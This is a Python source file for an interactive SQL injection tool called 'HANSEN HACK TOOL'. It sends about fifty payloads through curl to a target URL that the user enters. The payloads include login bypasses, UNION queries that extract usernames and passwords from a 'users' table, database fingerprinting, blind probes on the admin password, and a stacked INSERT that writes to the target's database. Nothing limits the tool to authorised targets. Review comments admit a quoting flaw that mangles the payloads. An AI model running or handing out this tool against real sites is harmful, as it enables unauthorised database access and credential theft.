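import shlex
import subprocess
from urllib.parse import urlsplit

try:
    from colorama import Fore, Style
except ImportError:
    # Colour is cosmetic: fall back to empty escape sequences so the tool
    # still runs where colorama is not installed.
    class _PlainText:
        """Stand-in for colorama's Fore/Style that yields empty strings."""

        def __getattr__(self, _name):
            return ""

    Fore = Style = _PlainText()


# Upper bound, in seconds, handed to curl for one request.
_CURL_MAX_TIME = 30
# The Python-side timeout is slightly longer so curl normally reports first.
_SUBPROCESS_TIMEOUT = _CURL_MAX_TIME + 5
_BAD_TARGET_MESSAGE = "Error: target URL must be an absolute http:// or https:// URL"


class HansenHackTool:
    """Interactive console tool that requests a target URL with a fixed payload list.

    Each string in ``payloads`` is sent as the value of five query parameter
    names (see ``_run_all_scans``), one ``curl`` GET request per combination,
    and the response body is printed.
    """

    def __init__(self):
        """Prompt for the target URL on stdin and build the payload list."""
        self.target_url = input("Enter the target URL: ").strip()
        # Kept verbatim, including the entries that repeat.
        self.payloads = [
            "' OR '1'='1",
            "' OR '1'='1'--",
            "' OR '1'='1'/*",
            "' OR 1=1--",
            "' OR 1=1#",
            "' OR 1=1/*",
            "' OR 'a'='a",
            "' OR 'a'='a'--",
            "' OR 1=1--+",
            "' OR 1=1/*",
            "' OR ''='",
            "' OR '1'='1'--",
            "' UNION SELECT NULL, NULL, NULL--",
            "' UNION SELECT NULL, table_name, NULL FROM information_schema.tables--",
            "' UNION SELECT NULL, column_name, NULL FROM information_schema.columns WHERE table_name = 'users'--",
            "' UNION ALL SELECT NULL, username, password FROM users--",
            "' UNION ALL SELECT NULL, NULL, GROUP_CONCAT(table_name) FROM information_schema.tables--",
            "' UNION ALL SELECT NULL, NULL, GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='users'--",
            "' UNION SELECT NULL, NULL, CONCAT('Database: ', DATABASE())--",
            "' UNION SELECT NULL, NULL, CONCAT('Current User: ', USER())--",
            "' UNION SELECT NULL, NULL, CONCAT('Current Database: ', DATABASE())--",
            "' UNION SELECT NULL, NULL, CONCAT('Version: ', @@version)--",
            "' UNION SELECT NULL, NULL, CONCAT('User Host: ', USER())--",
            "' UNION SELECT NULL, NULL, CONCAT('Table Count: ', (SELECT COUNT(*) FROM information_schema.tables))--",
            "' AND 1=CONVERT(int, (SELECT @@version))--",
            "' AND 1=2 UNION SELECT NULL, @@version--",
            "' AND 1=CAST((SELECT @@version) AS INT)--",
            "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--",
            "' AND (SELECT 1 FROM DUAL WHERE 1=1)--",
            "' AND (SELECT IF(1=1, 1, 0))--",
            "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--",
            "' AND (SELECT CASE WHEN (1=2) THEN 1 ELSE 0 END)--",
            "' AND (SELECT IFNULL((SELECT user()), 'null'))--",
            # NOTE: this entry carries a stacked INSERT, so the list is not
            # read-only with respect to the database behind the target.
            "' OR 1=1; INSERT INTO logs (message) VALUES ('SQL Injection Detected')--",
            "' OR EXISTS (SELECT * FROM users WHERE username = 'admin')--",
            "' OR (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0--",
            "' OR (SELECT LENGTH(password) FROM users WHERE username = 'admin') = 8--",
            "' OR (SELECT 1 FROM users WHERE username = 'admin' AND password = 'password')--",
            "' OR (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END FROM dual)--",
            "' AND (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0--",
            "' AND (SELECT LENGTH(password) FROM users WHERE username = 'admin') = 8--",
            "' AND (SELECT EXISTS (SELECT * FROM users WHERE username = 'admin'))--",
            "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--",
            "' AND (SELECT CASE WHEN (1=2) THEN 1 ELSE 0 END)--",
            "' AND (SELECT IFNULL((SELECT user()), 'null'))--",
            "' AND (SELECT IFNULL((SELECT COUNT(*) FROM information_schema.tables), 'null'))--",
            "' AND (SELECT IFNULL((SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users'), 'null'))--",
        ]

    def _print_title(self):
        """Print the banner in bright red."""
        print(f"{Fore.RED}{Style.BRIGHT}=== HANSEN HACK TOOL ==={Style.RESET_ALL}")

    def _print_message(self, message):
        """Print ``message`` in blue."""
        print(f"{Fore.BLUE}{message}{Style.RESET_ALL}")

    def _print_separator(self):
        """Print a 50-character rule between results."""
        print("-" * 50)

    def _target_is_http(self):
        """Return True when ``target_url`` is an absolute http(s) URL.

        The value goes straight into curl's argv. Without this check a value
        beginning with ``-`` would be parsed by curl as an option rather than
        a URL, and a non-HTTP scheme such as ``file://`` would make curl read
        something other than a web endpoint.
        """
        try:
            parts = urlsplit(self.target_url)
        except ValueError:
            return False
        return parts.scheme.lower() in ("http", "https") and bool(parts.netloc)

    def _run_curl_command(self, payload, scan_type):
        """Send one GET request with curl and return its output as text.

        Args:
            payload: value placed after ``scan_type=`` in the query string.
            scan_type: query parameter name.

        Returns:
            curl's stdout on success, otherwise a string starting with
            ``"Error: "``. No exception is raised for a bad target, a missing
            curl binary, a timeout or a non-zero curl exit status.
        """
        if not self._target_is_http():
            return _BAD_TARGET_MESSAGE

        # NOTE(review): shlex.quote() produces shell quoting, but the argv
        # list below is executed without a shell, so the quote characters it
        # adds are sent as part of the query value, and nothing here
        # percent-encodes that value. Left unchanged.
        escaped_payload = shlex.quote(payload)
        url_with_payload = f"{self.target_url}?{scan_type}={escaped_payload}"
        command = [
            "curl",
            "-sS",  # quiet progress meter, but keep error text for stderr
            "--max-time", str(_CURL_MAX_TIME),
            "-X", "GET",
            url_with_payload,
        ]
        try:
            result = subprocess.run(
                command,
                check=True,
                text=True,
                capture_output=True,
                timeout=_SUBPROCESS_TIMEOUT,
            )
        except FileNotFoundError:
            return "Error: curl executable not found"
        except subprocess.TimeoutExpired:
            return f"Error: curl did not finish within {_SUBPROCESS_TIMEOUT} seconds"
        except subprocess.CalledProcessError as e:
            return f"Error: {e.stderr.strip()}"
        return result.stdout

    def _run_all_scans(self):
        """Request every payload under every parameter name and print each result."""
        self._print_title()
        if not self._target_is_http():
            # Refuse once here instead of printing the same error per request.
            self._print_message(_BAD_TARGET_MESSAGE)
            return
        for payload in self.payloads:
            for scan_type in ["file_path", "parameter", "command", "directory", "payload"]:
                output = self._run_curl_command(payload, scan_type)
                self._print_separator()
                self._print_message(f"Scan Type: {scan_type} | Payload: {payload}")
                self._print_message(f"Output:\n{output}")

    def _prompt_user_choice(self):
        """Show the menu and return the raw line the user typed."""
        self._print_message("Please select an option:")
        self._print_message("1. Run all scans")
        self._print_message("2. Exit")
        return input("Enter your choice: ")

    def run(self):
        """Show the menu until the user picks a valid option, then act on it.

        A loop replaces the original self-recursion so repeated invalid input
        cannot grow the call stack.
        """
        while True:
            self._print_title()
            choice = self._prompt_user_choice().strip()
            if choice == '1':
                self._run_all_scans()
                return
            if choice == '2':
                self._print_message("Exiting tool.")
                return
            self._print_message("Invalid choice. Please select a valid option.")


if __name__ == "__main__":
    tool = HansenHackTool()
    tool.run()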